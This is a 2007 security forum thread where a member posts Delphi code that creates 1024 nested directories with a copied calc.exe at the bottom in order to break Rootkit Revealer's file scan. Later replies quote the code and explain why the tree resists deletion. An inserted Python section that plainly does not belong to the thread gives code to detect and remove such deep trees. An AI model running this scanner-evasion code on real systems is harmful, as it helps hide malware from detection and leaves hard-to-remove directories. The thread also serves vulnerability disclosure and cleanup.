
Exploiting Rootkit Revealer Vulnerability

EP_X0FF (Senior Member)
Posted: 09 June 2007 at 9:21pm
Rootkit Revealer (RKR) is a well-known standalone rootkit detection scanner which can be used for revealing widespread user mode rootkits and some kernel mode stuff.

It can detect hidden files by RAW reading and self-implemented file system parsing. It can detect hidden registry keys by dumping the registry to disk from its driver using the ZwSaveKey function and self-implemented parsing of this dump.

There exist several techniques which can be used to completely bypass RKR, but the detector itself can help in bypassing it. This vulnerability is present in every version of RKR, including the oldest command line variants.

The main goal of the exploit is to use the file-system restrictions which are obviously present in RKR. The exploit creates 1024 nested directories and copies calc.exe (Windows Calculator) to the last directory under the name "test.exe". After creating this exploit on disk, any RKR file scan will be completely useless, because RKR will list all directories and files on disk after the exploit directory as "Visible in Windows API, MFT, but not in directory index".

Using this exploit with the old console version will lead to an access violation message.

Exploit code is below.

WARNING!
Due to its file system origin and Windows UI restrictions it is not so easy to remove the generated exploit from disk. So do not use it on a real machine if you don't know how to remove it.


program DeepDirs;  { added wrapper so the snippet compiles as a Delphi console program }

uses
  Windows;

var
  i: Integer;
  buf: array[0..100000] of WideChar;     { the growing \\?\ path, far beyond MAX_PATH }
  buf2: array[0..MAX_PATH] of WideChar;  { the original used a custom LBuf type; assumed equivalent }
begin
  FillChar(buf, SizeOf(buf), 0);
  GetWindowsDirectoryW(buf2, MAX_PATH);
  { the \\?\ prefix disables Win32 path normalisation and the MAX_PATH limit }
  lstrcpyW(buf, '\\?\C:\adir');
  CreateDirectoryW(buf, nil);
  for i := 0 to 1023 do
  begin
    lstrcatW(buf, '\adir');
    CreateDirectoryW(buf, nil);
  end;
  lstrcatW(buf, '\test.exe');
  lstrcatW(buf2, '\calc.exe');
  CopyFileW(buf2, buf, False);
end.


This is not a "pure" exploit which escalates rights etc. It can be classified as another sample of Denial of Service.

To fix this vulnerability, RKR obviously needs built-in support for UNC paths.

Kind Regards,
EP_X0FF/UG North


Edited by EP_X0FF - 10 June 2007 at 10:52am
Ring0 - the source of inspiration
firabc (Newbie)
Posted: 09 June 2007 at 9:38pm

Clap

SystemPro (Senior Member)
Posted: 12 June 2007 at 9:09am

Originally posted by EP_X0FF



Exploit code is below.

WARNING!
Due to its file system origin and Windows UI restrictions it is not so easy to remove the generated exploit from disk. So do not use it on a real machine if you don't know how to remove it.


program DeepDirs;  { added wrapper so the snippet compiles as a Delphi console program }

uses
  Windows;

var
  i: Integer;
  buf: array[0..100000] of WideChar;     { the growing \\?\ path, far beyond MAX_PATH }
  buf2: array[0..MAX_PATH] of WideChar;  { the original used a custom LBuf type; assumed equivalent }
begin
  FillChar(buf, SizeOf(buf), 0);
  GetWindowsDirectoryW(buf2, MAX_PATH);
  { the \\?\ prefix disables Win32 path normalisation and the MAX_PATH limit }
  lstrcpyW(buf, '\\?\C:\adir');
  CreateDirectoryW(buf, nil);
  for i := 0 to 1023 do
  begin
    lstrcatW(buf, '\adir');
    CreateDirectoryW(buf, nil);
  end;
  lstrcatW(buf, '\test.exe');
  lstrcatW(buf2, '\calc.exe');
  CopyFileW(buf2, buf, False);
end.


Could you explain the persistence of the above code: why is it not easy to remove, and is this only related to NTFS or also to FAT32?

Mixel (Senior Member)
Posted: 12 June 2007 at 11:17am
hehe just try it ;)
a little clue
MAX_PATH = 255

EP_X0FF (Senior Member)
Posted: 12 June 2007 at 8:52pm
Originally posted by SystemPro

Could you explain the persistence of above code, why is it not easy to remove and is this only related to ntfs or also to fat32?


This code creates 1024 nested directories and puts Windows Calculator in the last one under the name "test.exe". After reaching this exploit directory the Rootkit Revealer driver goes mad and lists everything on disk as "Visible in Windows API, MFT, but not in directory index".

This was tested on an NTFS disk; I don't know about FAT32.
This exploit is not so easy to remove, because Windows Explorer (the default Windows shell) has path length limitations; as pointed out by Mixel, it is the MAX_PATH constant.

Explorer can't remove such directories and can't even normally calculate how many directories and files are inside such an exploit directory.
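As an added example (not code from the thread or from Sysinternals), here is the defender-side counterpart to what EP_X0FF and Mixel describe: a scan-and-cleanup routine that is not bound by MAX_PATH because it walks the tree through the \\?\ extended-length prefix and deletes bottom-up. It is Python rather than the thread's Delphi; the prefix is applied only on Windows, and the sample tree is constructed in a temporary directory at a much shallower depth than 1024 so it runs anywhere.

```python
import os
import tempfile
MAX_PATH = 260  # Win32 limit that Explorer and MAX_PATH-bound scanners respect
PREFIX = "\\\\?\\"  # the \\?\ prefix the thread refers to; lifts that limit

def extended_path(path: str) -> str:
    """Absolute path in the form Win32 accepts beyond MAX_PATH; the prefix has
    no meaning off Windows, so there the plain absolute path is returned."""
    path = os.path.abspath(path)
    if os.name == "nt" and not path.startswith(PREFIX):
        return PREFIX + path
    return path

def find_long_paths(root: str, limit: int = MAX_PATH) -> list:
    """Entries under root whose plain (unprefixed) absolute path exceeds limit."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(extended_path(root)):
        for name in dirnames + filenames:
            plain = os.path.join(dirpath, name).removeprefix(PREFIX)
            if len(plain) > limit:
                hits.append(plain)
    return hits

def remove_deep_tree(root: str) -> int:
    """Delete a nested tree bottom-up through extended-length paths, so the
    deepest entries go first. Returns the entries removed, root included."""
    removed, top = 0, extended_path(root)
    for dirpath, dirnames, filenames in os.walk(top, topdown=False):
        for name in filenames:
            os.remove(os.path.join(dirpath, name))
            removed += 1
        for name in dirnames:
            os.rmdir(os.path.join(dirpath, name))
            removed += 1
    os.rmdir(top)
    return removed + 1

def demo(depth: int = 60) -> tuple:
    # Constructed sample: depth nested 'adir' dirs (the thread's layout, kept
    # shallow for any platform) plus a placeholder 'test.exe' at the bottom.
    base = tempfile.mkdtemp()
    root = os.path.join(base, "adir")
    leaf = os.path.join(root, *(["adir"] * (depth - 1)))
    os.makedirs(extended_path(leaf))
    with open(os.path.join(extended_path(leaf), "test.exe"), "wb") as fh:
        fh.write(b"placeholder, not calc.exe")
    found = len(find_long_paths(root))
    removed = remove_deep_tree(root)
    os.rmdir(base)
    return found, removed, os.path.exists(root)  # (found, 61, False) for depth 60
```

The number of entries reported as longer than MAX_PATH depends on how long the temporary directory's own path is, which is why the scan counts rather than assumes a fixed number.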
SystemPro (Senior Member)
Posted: 13 June 2007 at 8:35pm
Sounds nice LOL, but why
\\?\C, a question mark before?
EP_X0FF (Senior Member)
Posted: 14 June 2007 at 12:32am
This means that this is a UNC path.
SystemPro (Senior Member)
Posted: 15 June 2007 at 9:38pm
Ah okay, server path. Besides, I posted "server path" yesterday but it did not seem to reach the board, so now I posted again: Ah okay, server path, thanks for the info.
EP_X0FF (Senior Member)
Posted: 15 June 2007 at 10:01pm
No problem :)